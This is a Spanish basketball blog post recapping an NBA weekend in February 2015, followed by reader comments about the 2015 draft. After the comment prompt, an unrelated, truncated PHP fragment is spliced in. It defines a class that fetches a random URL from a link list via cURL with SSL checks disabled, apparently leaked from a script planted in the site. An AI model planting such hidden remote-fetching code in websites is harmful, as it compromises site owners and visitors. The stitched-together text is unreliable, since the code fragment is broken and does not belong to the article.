Informe del fin de semana: Hawks en todos los terrenos

09 de February de 2015 por TheDeerHunter

Tremendo fin de semana de baloncesto. El viernes fue apoteósico con un largamente esperado Warriors – Atlanta que no defraudó a nadie pero también con cantidad de detalles e historias en el resto de partidos del día. El sábado pudimos descansar algo a pesar del susto que nos dio Anthony Davis y ayer domingo nueva ración de Hawks esta vez luchando en el barro con unos especialistas como son los Grizzlies. No salieron victoriosos de nuevo por bien poco. Pero vamos a repasar todo lo que ha dado de sí el fin de semana para no dejarnos nada.

VIERNES

Cómo no toca empezar hablando de “El PARTIDO”…

“Partidazo entre los dos mejores equipos de la competicion!! No defraudó en nada, los triples llovían y los contratataques eran delicias” jhc

Habemus nuevo capo y puede que para rato. Podía parecer una temeridad plantear ante los Warriors un intercambio de golpes pero al final lo que se demostró como locura fue que estos salieran a pecho descubierto ante la implacable artillería de los Hawks. 15 de 27 en triples. Hay que traer el paraguas…

“Una de las cosas que más me sorprendió fueron los 20 rebotes de Draymond Green, un tío que empezó en la NBA como 3 y ayer en los minutos finales actuó como 5.” luismi_vallecas

En efecto fue otro detalle que dejó el partido. Draymond Green, por sus virtudes defensivas, le ha comido definitivamente la tostada a David Lee (13 minutos disputados en un choque trascentental) y ahí los Warriors tienen un problema. Aunque de poco les sirvió a los de la bahía el dominio bajo los tableros.

“La 3ª de Celtics, la 3ª de Nets, fin a las rachas de Cav´s y Grizlies, Pistons de nuevo ganan, Miami sale de PO, La ceja asalta OKC, los Clippers miran al retrovisor con preocupación, la Barba sigue en MVP, Rubio is the new clutch man. Los Suns se resisten a ceder, los Spurs suman y suman… Y para alborozo de Denise, entrenador nuevo, victoria segura en Orlando.
Al final en la noche del viernes lo de menos fue el Hawks-Warriors.” Nacho

En efecto, el espectacular duelo del Phillips Arena sólo nos ofreció una parte del grandioso espectáculo que vivimos en la jornada del viernes.

Anthony Davisat the Buzzer” fundió a los Thunder en Oklahoma City con un triplazo inverosímil, después de que los locales lograran de milagro equilibrar un partido que tenían perdido. Duelo de dobles-dobles de 40 puntos entre entre el propio Davis y Russell Westbrook, quien se llevó el “mayor esfuerzo en vano” del año con 48 puntos, 11 asistencias, 9 rebotes y 4 robos… algo que no hacía nadie desde Larry Bird en la 1991-92. Y otro dato: nadie había firmado dos 45+ consecutivos en un back-to-back desde Chamberlain y Baylor. Telita, aunque no sabemos si todo eso le supondrá algún consuelo. Por su parte, el tercer equipo en la batalla por la octava posición del oeste, los Suns, ganaba a Utah con career-high de Marcus Morris.

Varias remontadas, en cambio, sí fructificaron. Los Grizzlies se confiaron y se dejaron levantar un partido en Minneapolis de risa, con Ricky anotando 8 puntos (de un total de 17) en un suspiro para obrar el milagro. A los Cavs también les pasó algo similar en Indianapolis pero los que se llevaron la palma fueron los Clippers que dejaron escapar hasta 20 puntos de ventaja ante el mejor Demar DeRozan del año. Orlando también tiró de remontada ante Lakers, con un inconmensurable Tobias Harris, para ganar en la prórroga.

Del resto, como ya comentásteis, grandioso una vez más James Harden en la apurada victoria ante Bucks; los campeones sacaron a Miami de zona de playoffs; los Celtics ganaron su 3ª consecutiva a costa de los Sixers, igual que los Nets que ganaron a Knicks; finalmente los Pistons ganaron relativamente fácil a los Nuggets (5ª derrota seguida).

SÁBADO

El sábado fue algo más light en comparación. Casi se nos mata Anthony Davis en un intento de alley oop. Los Bulls aprovecharon su baja para destrozar a los Pelicans y Pau Gasol para ser el mejor jugador de la jornada.

El choque más bonito lo vivimos en Dallas donde un gran Dirk Nowitzki doblegó en la prórroga a los Blazers. Mientras, los Warriors se resarcían de la derrota ante los líderes con un paseo en barca en el Madison Square Garden. El máximo cañonero de los Knicks fue Langston Galloway

Se rompió la buena racha de Celtics y Nets, los verdes cayeron en Milwaukee con dignidad y los Nets volvieron a las andadas recibiendo un serio correctivo en Washington. Los Sixers, con Robert Covington a la cabeza, sorprendieron a los Hornets y los Jazz ganaron a Sacramento.

DOMINGO

El plato fuerte del domingo era la visita de los Atlanta Hawks a Memphis. Tras ganar a los Warriors había ganas de comprobar que serían capaces de hacer ante Marc Gasol y compañía. El partido no tuvo nada que ver. Del ritmo frenético de hacer un par de días se pasó a otro más sosegado, duro y correoso, muy del gusto de los locales. Los Hawks estuvieron a punto de dar la campanada y demostrar que pueden con todo pero tras llegar empatados a los últimos minutos del encuentro, 8 puntos consecutivos de los Grizzlies mataron el partido.

La noticia del día, en cambio, estaba en Los Angeles y no por la paliza que recibieron los Clippers a manos de los Thunder sinó por la confirmación de la baja de Blake Griffin para aproximadamente mes y medio por una infección el codo derecho. El otro equipo de la ciudad también cayó, ellos ante unos Cavs donde el Big Three ejerció como tal y Kevin Love acabó con 32 puntos.

El otro gran partido del día se celebrababa en Houston pero acabó con victoria visitante. Los Blazers no estaban dispuestos a permitir que les pasara lo mismo dos noches seguidas y aunque se volvieron a dejar remontar, esta vez amarraron fuerte la victoria y acabaron venciendo con claridad a los Rockets a pesar de los 45 puntos, 9 rebotes y 8 asistencias de James Harden. Por cierto, finalmente Damian Lillard irá al All-Star pero han tenido que lesionarse dos compañeros para recibir un reconocimiento que se merece claramente.

Los Suns cayeron en Sacramento y otra vez por culpa de un buzzer-beater (ya van 4 en contra esta temporada). Esta vez el verdugo fue Demarcus Cousins.

En el Este, Indiana sigue con su buena racha tras imponerse a los Hornets con una canasta a falta de 5 segundos de George Hill. Esta victoria les deja a solo un par de victorias de la 8ª posición. Empatan con los Pistons que ayer perdieron ante unos renacidos Wolves que han ganado sus últimos 3 partidos y ya han abandonado el farolillo rojo de la competición que queda en manos de los New York Knicks. En la parte alta de la conferencia los Bulls ganaron gracias a un rebote ofensivo de Pau Gasol a falta de 10 segundos a los Orlando Magic y los Toronto Raptors se impusieron en casa a unos Spurs negados de cara a canasta. La victoria 1000 de Greg Popovich tendrá que esperar.

Comenta

4 comentarios a esta entrada

  1. Triceratops dice:
    #1

    ¿Podría alguien explicarme por encimilla como se avecina el Draft 2015?
    ¿Jugadores, características?
    ¿A quien cogerías para Orlando? (Suponiendo un pick entre el 4 y el 9)

      Citar

  2. Futurman dice:
    #2

    En Orlando falta talento… así que lo que caiga xD

    Por orden y sin mirar las necesidades de los equipos: Okafor, Mudiay, DeAngelo Rusell y Towns… Okafor irá primero si o sí, los otros parece que dependerá de quien elija. Luego ya salen europeos y proyectos peor valorados: Hezonja, Porzinguis, etc.

      Citar

  3. Larry Bird 33 dice:
    #3

    Me gusta Mudiay porque su decisión de ir a China “para alimentar a su familia” pese a que eso, seguramente, le hará caer algunos puestos en el draft me parece digna de alguien con la cabeza bien amueblada ya que lo primero es lo primero. Es un base de 1,98 al que comparan con John Wall. Luego Rusell también es otro guard que parece que tiene talento, se le compara con Brandon Roy (supongo que por talento, no tengo constancia de que sea dado a lesionarse) y a Ginobili. Después está Myles Turnes un PF/C que parece buen defensor y también con talento, le comparan con Aldridge. Respectivamente se les coloca como la 2, 4 y 8 posición en mockdraft.net y en hoopshype se les coloca como 2, 7 y 4. No sabría muy bien con cual quedarme, seguramente el PF es el que mejor nos vendría porque ya tenemos a Oladipo y Payton y Gordon no me acaba de convencer está a caballo entre el puesto de tres y de cuatro, mal tirador… no creo que llegue a ser una estrella. No vería con malos ojos un Gordon+Oladipo por un jugador contrastado o una ronda alta para tener a dos de estos tres. Payton pese a su horrible tiro de tres y su inaceptable % en tiros libres le daría un poco más de tiempo y sino mejora el próximo año buscaría un trade que tenerlo que cambiar al final del partido por Frye por el hecho de que no sabe tirar es bastante triste, ¿qué opinas Triceratops?)

      Citar

  4. Triceratops dice:
    #4

    Gracias a ambos

    Yo creo que después de 3 años de tragar basura, Orlando necesita urgentemente una estrella, y como no va a conseguirla via draft ni via agentes libres, se me antoja urgentemente un traspaso de algún joven + el próximo pick.
    A día de hoy, aprovechando que Tobias probablemente se pire sin recibir nada a cambio el equipo, creo que habría que empaquetarlo a algún sitio (si es posible junto a Channing Frye).

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>